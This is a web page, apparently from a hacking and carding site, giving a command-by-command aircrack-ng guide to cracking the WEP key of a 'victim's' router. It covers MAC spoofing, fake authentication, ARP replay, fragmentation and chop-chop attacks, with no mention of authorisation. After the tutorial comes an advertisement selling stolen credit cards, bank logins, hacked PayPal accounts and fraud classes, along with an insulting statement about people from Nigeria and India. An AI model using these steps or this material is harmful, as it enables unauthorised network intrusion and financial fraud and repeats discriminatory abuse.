You are currently viewing WEP Cracking with Backtrack – How to crack Wifi Password

WEP Cracking with Backtrack – How to crack Wifi Password

WEP Cracking with Backtrack – How to crack Wifi Password

In this guide, you will learn WEP Cracking with Backtrack.  We covered cracking WEP before, but using BackTrack should smooth out compatibility issues.

When Wi-Fi was first developed and popularized in the late ’90s, security was not a major concern. Unlike wired connections, anyone could simply connect to a Wi-Fi access point (AP) and steal bandwidth, or worse—sniff the traffic.
Wired Equivalent Privacy, or simply WEP, was the first attempt to secure these access points. This encryption method has been around for a while, and several flaws have been discovered. WPA and WPA2 have largely replaced it.

First, you will need to have Backtrack 4 (LINK)

*** I find it that if you are smart enough to be into hacking you will at least know how to burn an image file to a DVD, so after you do that, boot up the DVD and run BT4.

  • Login: root
  • Password: toor

Once logged in, type in: startx
BT4 is now set up, here’s the following.
==

WEP CRACK GUIDE
  • Open konsole and type the following to start up network connections./etc/init.d/networking start
  • Now we are going to put the network card into monter mode by typing the following.
    • airmon-ng
      (You will find your Interface here)
  • So first start up the scan
    • airmon-ng start wlan0 or 1
      (depends on what it reads your card as, replace as needed)
  • Lets spoof your MAC address first by typing this next command.
    • ifconfig wlan1 down
      macchanger -r wlan1
      ifconfig wlan1 up
    • This will make it so we change our MAC address to the computer we are connecting to
  • Time to start finding our victims router, type in konsole.
    • airodump-ng mon0
    • This will show the list and once you find one that suits your interest, Continue.
  • Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole
    • airodump-ng -c channel number, –bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)
    • example: airodump-ng -c 1 – – bssid 11:22:33:44:55:66 -w wepcap mon0
  • Lets start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:
    • aireplay-ng -1 1 -a The BSSID of the router, then the interface.
      example: aireplay-ng -1 1 a 11:22:33:44:55:66 mon0
  • Almost done, we just need to continue the ARP cycle, open another konsole and type:
    • aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.
    • Collect a good amount of IVs around 20k to 50k. Once its their, type CTRL – C to stop the process and continue to 9.
  • Time to start cracking that cap file :D Open a new konsole and type.
    • aircrack-ng -b (bssid) (file name)-01.cap
      example: aircrack-ng 11:22:33:44:55:66 wepcap-01.cap
  • Now we should have the key to log in to the router, have fun enjoying your hacked wifi ;)
  • Here is some alternate methods of using backtrack to get from the Hakunamatata69 Tutorial that are interesting and work too.

==
—ALTERNATE ATTACKS—
FRAGMENTATION

1. Konsole.
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) –bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap
==

CHOP-CHOP

1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
***Be sure to open new Konsoles when necessary***

NOTES

Key Commands.
wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)

45 minutes to write
10 minutes to edit
5 minutes to read
and only 1 second to say thanks, Ok :D

 

Henceforth, WE WISH TO ANNOUNCE THAT OUR SERVICES ARE NOT AVAILABLE TO PEOPLE FROM NIGERIA AND INDIA. THESE ARE USELESS TIME WASTERS AND THIEVES TRYING TO BEG OR SCAM US OF OUR PRODUCTS. OUR SERVICES ARE NOT FREE AND PAYMENT IS UPFRONT

A LOT OF FOOLS FROM NIGERIA AND INDIA. on the off chance that YOU DON’T TRUST TO USE OUR SERVICES, DON’T CONTACT US AS WE HAVE NO FREE SERVICE

CONTACT US FOR PURCHASE/INQUIRIES, WE RESPOND ALMOST INSTANTLY 

HI BUYERS, WE ARE A PROFESSIONAL CARDING AND HACKING TEAM. HOVATOOLS HAS BEEN AROUND SINCE THE TIME OF EVO MARKET, ALPHABAY, WALLSTREET MARKET AND MORE. WE REMAIN STRONG AND RELIABLE IN THE INDUSTRY, ALWAYS PROVIDING YOU WITH THE BEST QUALITY TOOLS TO HELP YOU MAKE MONEY AND MAXIMIZE PROFIT IN THE FRAUD GAME.

TO GET STARTED, YOU CAN VISIT OUR ONLINE SHOP/STORE TO BUY EVERYTHING YOU NEED TO START CASHING OUT.  AT THE SHOP YOU GET Accounts & Bank Drops CVV & CARDS DUMPS PERSONAL INFORMATION & SCAN.

BANK HACKING SOFTWARE – WIRE/ACH DARKWEB MONEY TRANSFER HACKERS

Buy Fresh Credit Cards for Carding, BIN LIST Buy Bank Login, RDP, Buy Hacked Paypal accounts. Contact us to buy all tools and carding software. CLICK HERE TO VISIT OUR SHOP
Buy Socks 5, Email Leads, Buy Latest CC to Bitcoin Cashout Guide, Buy Hacked Zelle transfer, Western Union Money Transfer Hack, Buy Hacked Money Transfer service to your bank account.
Enroll for Paid private Carding Class.

Admin

The enigmatic hacking blogger who unravels the digital mysteries through his captivating blog. With relentless curiosity and a nimble touch on the keyboard, I explore the intricate web of cyberspace, exposing vulnerabilities and advocating for responsible digital citizenship. My poetic and insightful articles paint vivid pictures of the ethical dilemmas surrounding privacy, encryption, and the convergence of technology and humanity. Join me on an exhilarating journey through the labyrinth of hacking and cybersecurity as he empowers readers to become guardians of their online identities.

Leave a Reply